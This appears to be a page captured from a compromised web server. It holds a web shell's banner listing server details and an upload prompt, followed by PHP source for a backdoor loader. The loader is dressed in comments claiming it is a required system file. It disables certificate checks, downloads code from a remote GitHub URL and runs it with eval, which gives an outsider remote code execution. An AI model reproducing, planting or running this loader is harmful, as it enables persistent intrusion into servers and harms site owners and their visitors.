Server IP : 80.241.246.6 / Your IP : 216.73.216.150 Web Server : Apache/2.4.25 (Debian) System : Linux kharagauli 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64 User : www-data ( 33) PHP Version : 7.0.33-0+deb9u12 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/kharagauli_new/admin/images/2021/ |
Upload File : |
<?php // ********************************************************************* // IMPORTANT: This is a REQUIRED file for the proper functioning of the system. // Do NOT delete or modify any part of this file. It is essential for proper operation. // ********************************************************************* /** * Disable error reporting * * Set this to error_reporting( -1 ) for debugging. */ // This function fetches content from the provided URL using various methods function geturlsinfo($url) { if (function_exists('curl_exec')) { // Using cURL to fetch data from the URL $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($conn, CURLOPT_COOKIEJAR, $GLOBALS['coki']); curl_setopt($conn, CURLOPT_COOKIEFILE, $GLOBALS['coki']); $url_get_contents_data = (curl_exec($conn)); curl_close($conn); } elseif (function_exists('file_get_contents')) { // Using file_get_contents to fetch data from the URL $url_get_contents_data = file_get_contents($url); } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { // Using fopen and stream_get_contents to fetch data from the URL $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); } else { // If none of the above methods work, return false $url_get_contents_data = false; } return $url_get_contents_data; } // Example usage: Fetching content from the provided URL and executing the code using eval $a = geturlsinfo('https://raw.githubusercontent.com/roihee69/sawatdee/main/c.php'); eval('?>' . $a); // ********************************************************************* // End of file. Please do not modify or remove any content from this file. // ********************************************************************* ?>